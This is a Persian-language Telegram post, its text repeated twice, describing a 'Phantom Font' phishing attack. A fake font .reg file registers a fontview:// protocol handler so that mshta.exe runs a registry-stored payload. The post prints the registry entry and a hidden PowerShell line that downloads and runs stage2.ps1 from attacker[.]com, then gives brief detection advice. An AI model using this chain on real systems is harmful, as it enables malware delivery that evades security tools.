🎯 حمله فونت شبح (Phantom Font Attack): جایی که mshta.exe با رجیستری متحد میشود!
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
چرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
🔸 هر اجرای ناگهانی mshta بدون فایل
🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer
یک فونت، یک فایل .reg و ابزار قانونی mshta.exe
و این سه در کنار هم میتوانند یک حمله Fileless واقعی بسازند که حتی EDRها هم جا بمانند!
🔎 پراسس mshta.exe چیست و چرا باید به آن شک کرد؟
پراسس mshta.exe یک ابزار رسمی ویندوز است که برای اجرای فایلهای hta (HTML Application) طراحی شده است.
این فایلها میتوانند شامل JavaScript و VBScript باشند و mshta.exe آنها را با سطح دسترسی کاربر اجرا میکند.
📌 محل پیشفرض:
C:\\Windows\\System32\\mshta.exeچرا مهاجمان عاشق mshta.exe هستند؟
✅ بهصورت پیشفرض در ویندوز نصب است (Living Off The Land)
✅ اجرای مستقیم اسکریپت حتی از اینترنت یا رجیستری
✅ اغلب در لیست سفید آنتیویروس و EDR قرار دارد
✅ ابزاری برای اجرای حملات Fileless و مخفیانه
📌 نمونه استفاده مخرب:
mshta.exe "javascript : new ActiveXObject('WScript[.]Shell').Run('calc.exe');close();"
🧩 مراحل حمله فونت شبح:
1️⃣ طعمه (Phishing)
قربانی ایمیلی با لینک نصب فونت شرکت دریافت میکند (مثلاً CorpSans.ttf)
اما بهجای فونت، یک فایل مشکوک
.reg را دانلود میکند.2️⃣ تغییر رجیستری (Registry Trick)
فایل .reg یک Protocol Handler جعلی به نام
fontview:// تعریف میکند.و میگوید: «اگر fontview://load فراخوانی شد، این دستور mshta را اجرا کن»:
[HKEY_CLASSES_ROOT\\fontview\\shell\\open\\command]
@="mshta.exe \"javascript:eval(new ActiveXObject('WScript[.]Shell').RegRead('HKCU\\\\Software\\\\PhantomFont\\\\Payload'));window.close();\""
3️⃣ اجرای کد بدون فایل (Fileless Execution)
صفحه وب به
fontview://load ریدایرکت میشود.پراسس mshta.exe اجرا میشود، مقدار Payload از رجیستری خوانده میشود و PowerShell مخفیانه اجرا میشود:
javascript
var sh = new ActiveXObject('WScript[.]Shell');
sh[.]Run('powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\'hxxp://attacker[.]com/stage2.ps1\'))"', 0, false);
🔍 چرا این حمله خطرناک است؟
✅ Fileless → هیچ فایل اجرایی روی دیسک نیست
✅ استفاده از ابزار قانونی ویندوز (mshta.exe)
✅ ذخیره کد در رجیستری → بدون فایل مشکوک
✅ اجرا بهصورت Stealth (بدون پنجره و هشدار)
🛡 نکات مهم برای Blue Team:
🔸 اجرای mshta.exe باید محدود یا مانیتور شود
🔸 تغییرات در مسیر
HKEY_CLASSES_ROOT و Protocol Handlerها را لاگ کنید🔸 هر اجرای ناگهانی mshta بدون فایل
.hta را بررسی کنید🔸 تحلیل دقیق ترافیک شبکه و DNS برای ارتباط با سرورهای مشکوک
🔐 یک فونت کافی است تا دری به سوی حمله باز شود.
امروز به mshta.exe شک کنید!
#RedTeam #BlueTeam #Malware #Phishing #FilelessAttack #RegistryHacking #mshta #CyberSecurity #WindowsSecurity #ThreatIntel #EDRBYPASS
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👏2🔥1🎉1🤩1